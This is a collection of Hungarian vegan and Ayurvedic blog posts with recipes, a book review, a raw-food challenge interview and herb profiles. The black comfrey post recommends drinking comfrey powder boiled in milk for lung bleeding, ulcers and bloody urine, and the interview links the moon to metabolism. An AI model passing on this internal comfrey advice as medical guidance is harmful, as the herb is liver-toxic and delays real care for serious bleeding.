Kedvezően hat a Bh akti jógát gyakorlók számára, mert az odaadást is fejleszti. Ájurvédikus szempontból pikáns, keserű, édes hűtő hatá sú, így mindhárom dósha szá má ra kedvező. Terhesség esetén nem alkalmazható! N agy dózisban narkotikum Felhasznált szakirodalom:dr. David Frawley és dr. Vasant Lad: Gyógynövény jóga
Mustáros rakott krumpli
Kétféle ember van: az egyik, aki imádja a mustárt, és ebből van a jóval több. :) Nekik ajánlom a most következő receptet, amihez egy igazán különleges, házi mustárkülönlegességet használtam.
Természetesen működik a dolog mezei mustárokkal is, de az igazán ínyenc ízek rajongóinak ajánlom figyelmébe a Marmaladys csodáit. Én egy pazar kóstolón találkoztam ezekkel az újszerű és lehengerlő ízekkel, és a kínálatból olyan nehéz volt a választás, hogy inkább a készítőre bíztam a dolgot. Így lett az enyém egy üveg fűszeres-magos mustár. Édeskés ízei jól harmonizálnak a szárított paradicsommal, és egyedi aromái tejszínben elkeverve beszivárognak a krumpli belsejébe, így téve igazán különlegessé ezt a rakottast.
Hozzávalók 2-3 adaghoz:
[...] Bővebben!
Variációk chiapudingra: egészséges alternatívák bűntudat nélkül
A chiamag szinte berobbant a köztudatba. Már elég sok helyen lehet vásárolni, de azért érdemes bio minőséget beszerezni. Miért is szeretjük ennyire ezt az apró magocskát? Remek tápanyagforrás, kiváló forrása az esszenciális zsírsavaknak, optimális az omega 3-6 aránya. Oldható és oldhatatlan rostok gazdag forrása. Tartalmaz kalciumot, foszfort, cinket, mangánt, molibdént, bórt, niacint, B12-vitamint és folsavat is. Jelentős mennyiségű fehérje található, 100 gr-ban 16 g. Az oldhatatlan rostok miatt lassan emésztjük meg, így alacsonyan tartja az inzulin szükségletünket, emésztésjavító hatása van és a tápanyagoknak is van idejük felszívódni. Ez a piciny magocska a tömegének 10-12x-esét képes magába szívni. Tehát 1 dkg mag kb. 1 dl vizet zselésít. Mindig duzzadt állapotban adjuk a gyerekünknek, ezért előtte minimum fél órára áztassuk be. Kerülhet kásába, turmixba, süteményekbe, kekszekbe is belesüthetjük. Vegánoknak remek tojáspótló. 1 evőkanál darált chiamag 3 evőkanál vízben áztatva bezselésedik, süteményekben ez használható tojás helyett. A hozzátáplálás során 1 éves kortól babák is kaphatják. Nézzük a chiapuding alapreceptjét: - 6 dl kókusztej - 5 puha datolya - 1 banán - 5 evőkanál chiamag - vaníliapor vagy fahéj Hogyan készítsünk belőle pudingot? A datolyát áztasd be a kókusztejbe. Kb. 15-20 perc elteltével, a banánnal és a fűszerrel együtt turmixold krémesre. Add hozzá a chiamagot és tedd be a hűtőbe néhány órára (akár egész éjszakára). Ha kellően puding állaga lett, akkor rétegezd gyümölccsel vagy keverd hozzá tetszés szerint a gyümölcsöt, kakaóport vagy a magkrémet. Variációk kedvünk szerint: Eperréteges chiapuding Áfonyás chiapuding Csokis-őszibarackos chiapuding Csokoládés-narancsos chiapuding Chia reggeli A lehetőségek végtelenek. Lehet még mogyorókrémes, lucumás, gojis, málnás vagy éppen baracklekváros. Rétegezheted a gyümölccsel vagy összekevered vele, így is, úgy is finom. Ha nem szereted a chiamag szemcsés állagát, akkor daráld meg, és a chiaport tedd a tejbe. Természetesen a tejet is variálhatod, ha neked pl. a rizstej a kedvenced, akkor azzal készítsd el. Az édesítésre a datolyát használtam, de jó hozzá a méz vagy éppen a juharszirup is.
Quinoás müzliszelet csokiöntettel
Valami édességre vágytak a lányaim. Ilyenkor szétnézek a kamra mélyén, hogy milyen alapanyagokat tudnék felhasználni. Igazán finom müzli lett belőle, bár legközelebb teszek bele úgy 2 evőkanál darált arany lenmagot. De egy reszelt almával is megér egy próbát. :) A hűtőben jó az állaga, de szobahőmérsékleten kicsit morzsálódik. De csak ennyi baj legyen... így is elfogyott. :) Hozzávalók: - 20 dkg aprószemű zabpehely - 5 dkg zabliszt - csipet himalája só - 1/2 mokkáskanál vaníliapor (vagy fél rúd vanília kikapart belseje) - 10 dkg datolya - 1 banán - 10 dkg kókuszolaj - 10 dkg dió - 4 dkg puffasztott quinoa - 1/2 bio narancs reszelt héja (vagy 4-5 csepp narancsolaj) - 1 kisebb narancs leve Csokiöntet - nyers csokijó krémesre darált kesudió (vagy 1 evőkanál kesudiókrém), de mogyorókrémmel is el tudom képzelni :) Elkészítése: Először is melegítsük elő a sütőt, úgy 180C fokra. Egy tálban keverjük össze a zabpelyhet, a lisztet, a sót és a vaníliát.Tegyük aprítógépbe a puha datolyát, a banánt és az olvasztott kókuszzsírt. Nyomjuk bele a narancs levét is. Pürésítsük simára. Öntsük ezt a keveréket a száraz hozzávalókhoz. Adjuk hozzá a durvára tört diót és puffasztott quinoát. Reszeljük bele a narancs héját is.Jól keverjük el. Öntsük bele a müzli keveréket a sütőformába, majd kézzel alaposan nyomkodjuk bele. Süssük 180C fokon 20-25 percig, amíg aranybarna lesz a teteje, a széle kicsit megpirul.Ha kihűlt, kenjük rá a kesudiós csokit.
Gyümölcsös kölespuding
Gyakran készítek a gyerekeimnek különböző desszerteket, amelyeket akár pudingnak is nevezhetünk. De ezek minden esetben valamilyen gabona alapúak, most éppen a kölesre esett a választásom. Szerencsére már megszokták ezeket az ízeket, állagokat... bár, nincs is más választásuk. :) Az agar-agar igazán jó állagot adott neki, olyan zselés lett, mintha valóban pudingot ettek volna. De mi is ez a furcsa nevű alapanyag? Ez egy természetes növényi zselésítő, a zselatin vegán változata. Tengeri vörösalgából készül. Kerülhet lekvárokba, dzsemekbe, gyümölcskocsonyába vagy éppen növényi joghurtba. Gumicukor és tortazselé is készülhet belőle. Ha színezni szeretnénk a zselét, eleve színes gyümölcslével keverjük ki, vagy a víz egy részét helyettesítsük pl. cukormentes szörppel. Hideg folyadékban kell feloldani, majd 2-3 percig forralni. Az agar-agar forrón híg, csak 40 fok körül sűrűsödik be. A zselésedési folyamat mindig megfordítható, bármikor felmelegíthető, újra szilárdítható. És most jöjjön a recept: Hozzávalók (4 adag): - 15 dkg köles - 7 dl rizstej - 1 dl meggylé - 1/2 rúd vanília - csipet himalája só - 2 evőkanál méz vagy kókuszcukor/juharszirup - 2 evőkanál aga-agar - kedvenc gyümölcsünk (nekem most erdei gyümölcs volt a fagyasztóban) Elkészítése: - A kölest jó alaposan mossuk át bő vízben.Egy száraz serpenyőben pirítsuk addig, hogy megszáradjanak a szemek. Érezni fogjuk az illatot, ami kimegy belőle.Öntsük fel a tejjel, tegyük bele a kikapart vaníliát a rudat is, és a sót.Kb. 15 perc alatt kellően megpuhulnak a szemek.Egy kevés vízben oldjuk fel az agar-agart, majd keverjük a kásához. 1-2 rottyantás elég neki.Vegyük le a tűzről, tegyük bele a mézet. Nekem éppen volt kioolvasztva meggy, így ennek a levét is beleöntöttem. Tegyük formába, és hagyjuk megdermedni.Gyümölcszselével vagy friss gyümölcspürével kínáljuk.
Mandulatej készítése házilag
2016. május 7. Élj harmóniában
Mandulatej készítése házilagAkinek az emésztőrendszere a születéstől fogva vagy esetleg a sok túlterheléstől már nem tudja a tehéntejet emészteni, számukra jó alternatíva a magtejek fogyasztása. Igazából mindenkinek jó szívvel ajánlom, mert egészségesek és ízletesek. természetesen a tehéntej fogyasztás mellett is jól jön néha egy kis magtej, a kettő nem zárja ki egymást. Sajnos a boltok polcain kapható magtejek nem csak nagyon drágák, de ájurvédikus szempontból a tamasztikus ételekhez tartoznak, mert nem frissek (az ételek egészségre és tudatra gyakorolt hatásairól egy korábbi cikkben itt olvashatsz). Gondolj csak bele, a bolti mandulatejet bezárják egy tetrapack dobozban 1 évig jó mi lehet benne - vajon mennyi friss életerő.... A friss magtejek készítése nagyon egyszerű, igazából egyetlen feltétele van legyen egy jó turmixgéped:) Szinte bármilyen magféléből tudsz tejet készíteni. mivel az ájurvéda a mandulát tartja az egyik legjobb szuper élelmiszernek, így én sem találtam még jobbat:) Hozzávalók 0,5 csésze mandula 1,5-2 csésze tiszta minőségű víz (forrás víz a legjobb) A mandulákat forrázd le, picit hagyd állni és utána távolítsd el a héját - vagy használhatsz balanszírozott mandulát is, akkor ezt a lépést kihagyhatod. Majd a héjától megszabadított mandulát áztasd vízbe egy éjszakára, de minimum 6 órára. Öntsd le róla az áztatóvizet és tedd a turmixgépbe a vízzel együtt. Én a forrásvizet előtte forralom és langyosan teszem hozzá, mert számomra melegen a tejnek nagyobb az élvezeti értéke. E bből a mennyiségből közel fél liter tej lesz - attól függ mennyire szeretnéd sűrűre. Ha hígabbra szeretnéd, tegyél hozzá több vizet. Turmixold néhány percig, amíg tejszerű, sima állagú folyadékot nem kapsz - a legjobb ha ehhez a művelethez ha rendszeresen készítesz magtejet nagyobb teljesítményű gépet használsz kb. 800 w . A kész tejet szűrd át egy textilpelenkán vagy egy alkalmas kendőn. Ha szeretnéd ízesíteni, akkor tedd vissza turmixgépbe és áztatott datolyával vagy datolyasziruppal, fahéjjal esetleg vaníliával turmixold össze. Használhatsz bármilyen édesítőszert és fűszerezést, hogy egy igazán jó tejes italt kapj. Vegyszermentes (bio) alapanyagokat használj!
Fűszeres-gyümölcsös tejberizs
Szerda délutáni uzsonna volt a gyerekeknek.... akár dupla mennyiséget is készíthettem volna, mert még a kicsi lányomnak is kevés volt egy adag. Bármilyen gyümölccsel készíthetjük, most a fagyasztóból került bele erdei gyümölcsös és epres. De amint jön a szezonja, akkor frisset fogok beletenni. Hozzávalók: - 1 csésze rizotto- vagy tejrizs - 3 csésze rizstej - 1 rúd vanília - kb. 1,5 dl kókusztejszín - 2 evőkanál kókuszcukor vagy méz - 1 kávéskanál fahéj - pici kardamom Elkészítése: V astag aljú edénybe feltesszük a tejet a kikapart vaníliával, a többi fűszerrel és a rizzsel alacsony hőfokon főzni.Az első 10 percben magára hagyhatjuk, de utána mindenképp kevergessük.Amikor már puha a rizs, és kellően be is sűrűsödött, vegyük le a tűzről. Adjuk hozzá az édesítőszert (mézet vagy a kókuszcukrot) és a kókusztejszínt. De házilag készített mandulatejszín is jó hozzá.Egy pohárba rétegezzük kedvenc gyümölcsünkkel, amit előtte megszórtuk fahéjjal és pici kókuszcukorral.Ennek nem lesz az a megszokott fehér színe, hiszen a fahéj és a kókuszcukor is barnít rajta.
A fekete nadálytő hatásai
2016. május 2. Élj harmóniában
A fekete nadálytő gyökerét és levelét is hasznosítják, itthon elsődlegesen zúzódásokra, sérülésekre való készítményekben vált ismertté. A fekete nadály hatással van a légzésre, emésztésre, vérkeringésre és az idegrendszerre. Hatásait tekintve: tápláló erősítőszer, gyulladáscsökkentő, nyálkaoldó, sebgyógyító, lágyító, összehúzó és vérzéscsillapító. Új szövetek képződését nagyon kiválóan elősegíti. Javasolt köhögésnél, tüdőfertőzéseknél, tüdővérzésnél, gyomor és bélfekélyek esetén, véres vizeletnél, hasmenésnél, rándulásoknál, sebeknél, töréseknél, sérüléseknél, keléseknél a használata. Kiváló szövetépítő, ezért hatékonyan segíti a sebgyógyulást, sérülésekből való felépülést. Gyökere inkább erősítő, levele összehúzó, gyulladásgátló hatású. A tüdő nyálkahártyáját fiatalítja, táplálja, erősíti. Mindenféle tüdőproblémánál jól használható, ahol gyulladás, vérzés vagy valamilyen pusztulásos betegség áll fenn. Erősítésre és vérzéscsillapításra az ájurvéda 2 kávéskanál port javasol felforralni egy csésze tejben. Nyálkaoldó szerként hevítő fűszerekkel célszerű kombinálni - gyömbér, szegfűszeg, kardamom. - különben pangást okozhat a testben. Ájurvédikus szempontból édes, fanyar és hűtő minőségű. Csökkenti a vatat, pittát és növeli a kaphát. Rossz felszívás, elhízás, ödéma esetén és magas ama állapotban ne alkalmazd! Felhasznált szakirodalom:dr. David Frawley és dr. Vasant Lad: Gyógynövény jóga
Állitsuk fel a zászlót
A Forks Over Knives videójában Állitsuk fel a zászlót vegán étrenddel cimmel Dr. Terry Mason kifejti, hogy a merevedési zavar valójában az első klinikai mutatója az általános szív-és érrendszeri betegségeknek. Ez a kanári a szénbányában. Mivel a merevedési zavar konkrétan az egyik tünete lehet a szívbetegségeknek, azt akartuk, hogy egy szórakoztató, de oktató jellegü videó vigye a hírt, hogy a teljes értekü élelmiszerek, illetve a növényi alapú étrend javítja a szexuális funkciót, a
Tóth Gábor – Beteg táplálékaink
2016. április 30. Vegán lettem
A Beteg táplálékaink című könyv a húsokban előforduló kórokozókat és az állati eredetű élelmiszerek fogyasztásának kockázatát mutatja be. Beteg táplálékaink, a könyv A Beteg táplálékaink című több mint 550 oldalas masszív olvasmány nem kifejezetten vegán, hanem tudományos és egészségügyi oldalról világítja meg a húsfogyasztással szorosan összefüggő problematikákat. Ugyan egy rövid bekezdésben olvashatsz az állattartás erkölcsi problémáiról bibliai szemléletmódon átvezetve, de a könyv alapvetően nem etikai és nem állatjogi oldalról közelíti meg a témát. A könyv szerzője, Tóth Gábor okleveles élelmiszeripari mérnök és táplálkozáskutató, szakterülete a táplálkozás- és élelmiszertudomány. Számos könyvet írt már többek között candida, génmódosított élelmiszerek, édesítés vagy akár az e-számok témájában. A Beteg táplálékaink című könyv nagy alapossággal és szinte már zavarba ejtő részletességgel mutatja be mindazon az emberi szervezet számára veszélyesebb és kevésbé veszélyes betegségeket, melyek a húsfogyasztással szorosan összefüggenek. Olvashatsz a húson keresztül szervezetbe kerülő daganatkeltő vírusfajokról, agresszív baktérium törzsekről és egyéb parazitákról is többek között. Ha nem érint meg a veganizmus etikai része, viszont a saját egészséged érdekel és nem csak hosszú, de egészséges életet szeretnél, akkor ez a könyv neked szól! Beteg táplálékaink, a tartalomjegyzék A könyv tartalma annyira bő és a témában mindenre részletre kiterjedő, hogy a tartalomjegyzéke nem kevesebb mint hét oldalra sikeredett. Ezen bejegyzésben csak a nagy és a témát érintő fontosabb albekezdések címeit írom le, valamint a fejezetekből párat példának, hogy átlásd a könyv alaposságát. - Előszó - Bevezetés - A környezetbiológia törvényei - Az anyag körforgása és az élőlények láncolata - Az élettelen környezet hatása a mikroorganizmusokra - Hőmérséklet, nedvesség, Kémhatás, stb. - A mikroorganizmusok élőhelyei - A mikrovilág nagyjai - Kórokozók és eszközeik - Intelligens gyilkosok: a vírusok - Sokoldalú baktériumok - Néhány pusztító járvány terjedése és összefüggése az állatvilággal - Világméretű influenzajárványok és okaik - Az állatok mint a betegségek legfőbb terjesztői - Az emberre veszélyes állatbetegségek kialakulása és elterjedése - Miért válnak egyre agresszívabbá a mikroorganizmusok? - A globalizáció következményei - Miért hajlamosabbak a betegségekre a túltenyésztett haszonállatok? - Félelmet keltő állatbetegségek - A XX. század “záróakkordja”: a kergemarhakór - A XXI. század “nyitóakkordja”: a madárinfluenza - Az emberi rákbetegségek kapcsolata az állatvilággal - A vírusok és a rák - Átvihető-e a rák? - Élelmiszer-fogyasztással kapcsolatos fertőzések és mérgezések - Az állati eredetű ételek régi-új szennyezője, a Salmonella - Növekvő kockázat a szárnyasoknák: Campylobacter - A disznóvágások szemtanúja: Clostridium botulinum - Száj és körömfájás - A darált hús és a spirális fonalféreg találkozása - Az élelmiszerekkel feltételes összefüggő egyéb korokozók - Emberre is veszélyes belső élősködők - Mérlegen az állatok és állati eredetű termékek - A haszonállatok állat-egészségügyi és higiéniai szempontból - Az állati eredetű termékek mikrobiológiai kockázata - Az állati eredetű termékek vizsgálata táplálkozás-élettani szempontból - A jól működő immunrendszer, mint a védelem kulcsa - Étrendi alternatívák az állatbetegségek kapcsán - Az egészségügyi kérdéseken túl - Az állati eredetű termékek fogyasztásának etikai és lelki vonatkozásai Kiadója: Pilis-Vet Bt. Kötés: Puhatáblás, ragasztókötött Kiadás éve: 2006 Terjedelem: 581 oldal Ár: kb. 3000Ft
Illatos édescsiga
Nálunk már lassan pünkösd, mégis, de erre a hétvégére esik a görög húsvét, vagyis az a ritka eset állt elő, hogy idén öt héttel később ünnepelnek, mint mi. (A két húsvét bonyolult, de mégis egyszerű kapcsolatáról ebben a cikkben írtam.)
Gyönyörű lenn az idő, hétágra süt a nap, és a már régen ébredező természet nagyban készül az egyik legendás görög nyárra a sok közül. Már egy ideje nézegettem az egyik kedvenc blogomban ezt a receptet, és holnap végre illatos édescsigát eszik a család! :)
Hiszen mi pedig az édesanyákat ünnepeljük holnap, én ezt a receptet választottam az enyémnek, és remélem, ízleni fog neki. :)
És bár a munka ünnepe is vasárnapra esik, én az ezzel kapcsolatosat inkább korábban végeztem el, és a csiga a mélyhűtőben várja, hogy frissen ehessük, viszont minél többet lehessünk együtt aznap. Hozzávalók 10 csigához:
[...] Bővebben!
Bounty-golyók
Már régen írtam édesség-receptet, itt az ideje pótolnom. Hihetetlen gyorsan, mondhatni 15-20 perc alatt el tudjuk készíteni. Csak dermedni kell hagyni egy kis időre a hűtőben. Szóval remek vendégváró falat, de ha csak valami édességet ennénk, lehetőleg egészségesebb formában, ne hezitáljunk elkészíteni ezeket a tömény kókuszos édességvágy-csillapítókat :) Mivel természetes alapanyagból van (kókusz és banán), tényleg képes csillapítani az édesség iránti vágyunkat.
A recept:
Hozzávalók:
- 15 dkg kókuszreszelék
- 2 nagyobb, érettebb banán
- 1/2 vanília kikapart belseje
Csokis külsőhöz:
- 1 tábla tortabevonó (az ét tortabevonók általában vegánok)
vagy
- karob vagy kakaópor (vagy mindkettő fele-fele arányban)
kókuszzsír (folyékony állapotban)
kókuszvirág cukor vagy xylit vagy gyümölcscukor vagy datolyaszirup vagy méz, stb.
Elkészítés:
A kókuszreszeléket kimérjük egy keverőtálba, a banánokat villával összenyomkodjuk, majd a kókuszreszelékhez kavarjuk, hozzáadjuk a vaníliát is. Jól átdolgozzuk a kókuszt és a banánt, majd golyókat formálunk a kezeinkkel.
Vagy olvasztott csokiba mártjuk (utána alufóliára érdemes tenni, arról könnyű leszedni), vagy csokimázt készítünk a következők szerint:
A folyékony kókuszzsírt (ha szilárd, rövid idő alatt folyékony lesz, ha tűzhelyen melegítjük) összekeverjük karobbal/kakóporral és valamilyen édesítő-szerrel. Esetleg egy kis kézmeleg növényi tejet keverhetünk még hozzá. Ha a karobos-kókuszzsíros verziót választjuk, akkor tényleg full egészséges, nyers desszertben lesz részünk.
UI: Persze nem muszáj banánnal édesíteni. Aki fogyaszt, készítheti mézzel vagy valamilyen sziruppal. Ha banánnal készítjük, enyhén színét veszti a fehér kókusz. Besötétül némileg.
Fehérborban párolt zöldségek kapribogyós majonézzel
2016. április 25. Vegán muflon
Néha bizony jólesik kiszakadni az utcai kaják fokhagymaszagú sikátorából, és áldozni a sznobéria oltárán. (És persze nem utolsó sorban úgy tenni, mintha tényleg tudnék főzni.) Így hát ezúttal egy kevésbé költséghatékony, de annál finomabb specialitással állnék elő, mindent az olvasóért alapon. Az meg rohadtul ne zavarja őket, hogy a hónap hátralévő részében olyan kajákon fogok élni, mint Rogerius püspök a tatárjárás alatt! A heti menü: Kedd - Felbontatlan meggybefőtt II. Ulászló idejéből; Szerda - Darált mák fél zacskó száraz kókuszreszelékkel; Csütörtök: Száraz csigatészta mozsárban összetörve (mert hogy ekkorra már a vizet is elzárják és kikapcsolják az áramot); Péntek - Kátránypapír-fecnik Piros Arannyal; Szombat -Kátránypapír-fecnik Piros Arany nélkül; Vasárnap - Május elseji lángosmaradék a Városligetben. Naszóvalakkor a hozzávalók: 2 db sárgarépa 5 szál spárga 1 fej édeskömény 1 db közepes cukkini 2 db póréhagyma A főzőlöttyhöz: 6 dl fehérbor (Lehetőleg ne olyan, amit nemrég téptünk ki egy Boráros téri punk kezéből!) 1,5 dl olívaolaj 2 babérlevél 1 nagy citrom leve 2 zellerszár hasábokra nyiszatolva 1/2 fej hagyma egészben só A vegán majonéz elkészítését itt pofáztam el. Na, ehhez lapátoljunk hozzá 2 ek felaprított kapribogyót. A zöldségeket - a spárga kivételével - mély beleéléssel felszeleteljük hosszában. Egy edénybe eltartott kisujjal beleöntjük a fehérbort, és addig melegítjük, míg ízlésesen gyöngyözni nem kezd. Ekkor belehelyezzük a főzőlé többi hozzávalóját, majd mikor már forr, beleoktojáljuk a sárgagépát és az édesköményt. Jó három perc múlva a cukkinit, a spárgát és a póréhagymát is a lébe fojtjuk, és további három-négy percig főzzük. Nem tovább, mert löttyedtek lesznek, mint egy Apostol-koncert a babosdöbrétei murcifesztiválon! Ezután egy csipesszel kiszabadítjuk őket, majd lelkiismeret-furdalás nélkül nyakon öntjük a majonézzel! (A főzőlötty mellesleg hűttőben tárolva később is felhasználható.) Friss kaporral dekorálhassa, aki ad az esztétikára!
Nyers Kihívás, avagy táplálkozással önmagadért
2016. április 22. Vegán lettem
A Nyers Kihívás egy évek óta tartó mozgalom, melynek célja, hogy minél többen megismerjék a nyers étkezés jótékony hatásait.
A Nyers Kihívással először két éve találkozhattál, amikor István – akkor még a Nyersétel Akadémia séfje – először csinálta meg az egy hónapig tartó nyers vegán diétát. Ismerősei körében olyan mértékű érdeklődés övezte tevékenységét, hogy rögtön meghirdette facebookon az első nyilvános Nyers Kihívást, melyen több tucatnyian vettek részt. Varga Istvánnal, a Nyers Kihívás, a Nyers Nyaralás és a Nyers Valóság projektek atyjával beszélgettem.
Mikor alapítottad a Nyers Kihívást és mi a célod vele?
Két éve tavasszal indult az első nyilvános kihívásom, melyen nagyon sokan vettek részt. Célom ezzel a kezdeményezéssel, hogy minél több emberhez eljuttassam a nyers étkezés csodáját és hogy igenis lehetőségünk van változtatni a világunkon pusztán az étkezésünk által, de ezt a változást először magunkkal kell elkezdenünk. A Nyers Kihívás üzenete egyébként egyszerű: dolgozz magadon és edd magad boldogra!
Kiknek ajánlod a Nyers Kihívást?
Mindenkinek aki változtatni szeretne az életén. Ha a testünk egy jármű, akkor ez a táplálkozás egy sűrített rakéta üzemanyag, mellyel az átlagosnál magasabb üzemi szintre húzhatjuk fel testünket. De nem szabad beleugrani felelőtlenül egy ilyen diétába. Mindig figyelembe kell venni a vállalkozó nemét, korát, egészségügyi állapotát, fizikai aktivitását, anyagi helyzetét, motivációját és ezek függvényében kialakítani az egy hónapos étrendet. A vállalkozó kedvű kezdőknek minden esetben e-mailben nyújtok segítséget.
Egy holdhónapig tart a Nyers Kihívás. Miért pont 30 nap és miért pont holdhónap?
Általában 30 nap elég szokott lenni a szokásaink megváltoztatásához, illetve a holdciklus miatt nem is pontosan 30 nap. A hold nagyon sok téren gyakorol hatást az életünkre, melyek közül talán az egyik legfontosabb az érzelmekre gyakorolt hatása. Ennek fényében a Nyers Kihívás első két hete megszokásaink elengedéséről szól, majd az újhold, az új dolgok befogadásában segíthet minket. Továbbá mivel testünk nagymértékben víz, így az anyagcserénket is segíti ez a változás. Ennek kapcsán nagyon fontosnak tartom, hogy van mibe kapaszkodni ez idő alatt és a hold mint segítő barát van jelen a Nyers Kihívás alatt. Ha az óceánokat ily mértékben képes megmozgatni, akkor jól jöhet nekünk is az ereje.
Szépségkonyha kontra Nyers kihívás. Hol kapcsolódnak ezek egymáshoz?
A minőség nagyon fontos dolog az életemben. A Szépségkonyha a minőséget, a finomságot, a tisztaságot jelképezi és mutatja be a táplálkozáson és a szépségápoláson keresztül. A Szépségkonyha a nyers táplálkozáson belül a nyers vegán gourmet vonalat képviseli, a bőrápoláson belül pedig a vegán szépségápolással az ehető kozmetikumokkal foglalkozik. Enne kapcsán fontosnak tartom megemlíteni, hogy nem csak étkeinkkel hanem a mindennapi bőrápolás során használt kozmetikumokkal is nagyon sok egészségtelen dolgot vihetünk be a szervezetünkbe, melyek nagy része akadálytalanul is felszívódik. Ezért ajánljuk az ehető kozmetikai készítmények használatát, melyekben semmi természetellenes nincs. Rendszeresen tartunk nyers vegán élményvacsorákat is, hogy mindenki megtapasztalhassa van élet a salátán túl!
Miben látod a Nyers Kihívás mozgalom erejét?
Részben abban, hogy nincsenek merev szabályok, mindenki magához mérten állítja fel a saját kihívását és mindenki annyit tesz bele amennyit maga szeretne. Emellett ez egy azonnali pozitív “visszajelzéssel” járó életmód váltás, ami egy erőteljes belső munkával párosul. Ez a belső munka az, mely megadja a Nyers Kihívás erejét. Mindenki egyéni belső munkája. Ugyanakkor én úgy gondolom, hogy a Nyers Kihívás elsősorban magunkról és a belső munkáról szól, ezért a mozgalom szó nem biztos hogy ideális kifejezés rá. Májusban a Mecsekben, nyáron Görögországban, ősszel pedig Balin fogunk nyersezni, tapasztalni. Ez a mozgolódás olyan lesz amilyenre csináljuk, csak rajtunk múlik. Rendszeresen szoktunk záró vacsorákat tartani, ahol a kihívás utolsó napján együtt eszünk újra hőkezelt vegán ételeket. Minden ilyen élmény erősíti ezt a kezdeményezést.
Mit ajánlasz azoknak akik tervezik, hogy részt vesznek egy Nyers Kihíváson? Hogyan kezdjék, hogy álljanak hozzá?
Legfontosabb maga a döntés és annak a véghezvitele, tehát szerintem ez az egész fejben dől el. Mindenki adjon magának pár percet és őszintén válaszolja meg magának, hogy miért is akarja ezt csinálni. Ha a motiváció megvan, mely erős és tiszta akkor nem lesz gond. Utána érdemes információt gyűjteni hiteles blogokról vagy akár tőlünk e-mailen keresztül vagy a Nyers Kihívás honlapján, ahova számos hasznos információ kerül fel és indul majd egy receptjáték is. De barátsággal ajánlom Sütő Mónika nyersétel blogját is többek között, aki nem csak hitelesen ír, de hitelesen él is. A megfelelő mennyiségű információt mindenki formálja és szűrje saját igényei szerint. Ezen a ponton, amikor az őszinte motiváció találkozik a hiteles forrásokból megszerzett hasznos tudással, már semmi sem tántoríthat el a változtatásról.
Apropó recept játék, pontosan mi ez? Mesélnél róla röviden?
A Nyers Kihívás keretein belül indítok egy receptjátékot, amelyen mindenki részt vesz aki beküld egy vagy több képet a Nyers Kihívás alatt készített nyers ételeiről. A játékszabályok egyszerűek, az étel mellé egy kézzel írt papírt kell tenni “9. Nyers Kihívás” felirattal. Ezután a képet, recepttel együtt küldjék el a Nyers Kihívás facebook oldalára. Mi minden képet és receptet feltöltünk, melyből a nyertest a közösség választja ki. Számos értékes nyeremény vár gazdára, melyeket a játék keretein belül hirdetek ki.
Mikor kezdődött a Nyers Kihívás és milyen sűrűn tervezed a jövőben?
Az aktuális Nyers Kihívás április 22-én, pénteken indult. A továbbiakban pedig évszakonként tervezem és minden alkalommal egy hónap lesz a menetrend, az idők végezetéig.
Gyakran beszélsz többes számban, ez azt jelenti hogy vannak segítőid is?
Igen. Nagyon szerencsésnek érzem magam, mivel nagyszerű személyeket küldött segítőnek az Élet. Többek között Bali Anita, aki a Nyers Nyaralások szervezésében segít, Nádasdi Krisztina, aki az Elysium Vegán Beauty ügyvezetője, Palló Tímea a pécsi Natúr Ételbártól, Szőke Gábor a Nyersétel Akadémia ügyvezetője, Kertész Róbert vegán ironman és Sulyok Csillag vegán bikinimodellt, akik mindig támogatnak. Mellettük számos barátom és segítőm van országszerte, nekik is köszönök mindent, még ha most nem is nevesítettem mindenkit. Nem lenne elég hely a blogodon.
Végezetül, mikor és hol találkozhatnak veled a Nyers Kihívásra vállalkozók a közeljövőben?
Az aktuális rendezvényeinkről facebook és weboldalainkon informálódhatnak az érdeklődök. Sűrűn vagyunk Budapesten, de szívesen megyek vidékre is, mivel az embereknek kézzelfogható tapasztalatokra van szükségük elsősorban, nem csak virtuális tanácsadásra. Egészen konkrétan április 26-án a Metro Gasztroakadémián tartok képzést, majd május 7-én és 8-án Mánfán nyersétel hétvégét. Egyébként vegán sportolókkal tervezünk egy előadás sorozat elindítását a ,,Honnan veszi a vegán a fehérjét? témában. Szembeállítjuk a városi legendákat a tényekkel, mindezt kézzelfogható-kóstolható formában. Valamint kifejezetten a Vegán Lettem olvasók nagy örömére minden hónapban küldök majd egy exkluzív receptet neked a blogra. Köszönöm a lehetőséget!
Kapcsolódó linkek:
A Nyers Kihívás facebook oldal
A Nyers Kihívás Honlapja
A Nyers Nyaralás facebook oldal
A Nyers Valóság facebook oldal
Alma chutney (csatni)
2016. április 16. Élj harmóniában
Alma chutney (csatni)A csatnik (chutney) ízek és színek a tányé rodon:) Olyan e gyszerre csípős és édes csemegék, melyek segítik az emésztést, jó étvágyat csinálnak és szép, színes látványukkal örömet okoznak a szemnek. Továbbá kiemelik az ételek ízét is. Vannak nyers és főtt csatnik is. Egy csatni a nnyira csípős, hogy nem lehet megenni és annyira édes, hogy nem lehet otthagyni:) M indig csak egy kanálnyit tegyél az ételek mellé. Korábban is tettem már ki egy szilva csatni receptet (itt olvashatod). Általában egyszerre édes, sós, csípős vagy akár savanyú ízeket is intenzíven hordozhat egy csatni magában. Készülhetnek nyersen vagy főzve is. Az alma csatninak is számos változata létezik. Ma az ánizsos változatot készítettem el. - 1 ek. ghí (vagy vaj) - 3/4 k k. ánizs - 1 egész szárított ch ili - 1/2 kk. kurkuma - 3 közepes alma - 3 ek. finomítatlan nádcukor - 25 ml víz Vegyszermentes (bio) alapanyagokat használj :) Készítsd elő az almát, mosd meg és vágd kis kockákra. A ghít (vagy vajat) melegítsd fel és szórd bele az án izst, kezd el megpirítani , majd morzsold hozzá a chilit és a kurkumát is szórd hozzá és pirítsd egy picit együtt. Tedd hozzá az almát és párold 4-5 percig, majd tedd hozzá a vizet és fedő alatt párolt amíg meg elkezd szétfőni. Végül tedd hozzá a cukrot és még főzd kis lángon - amíg megfelelő sű rűségű nem lesz. Bármilyen étel mellé kiváló:)
Olívás répasaláta
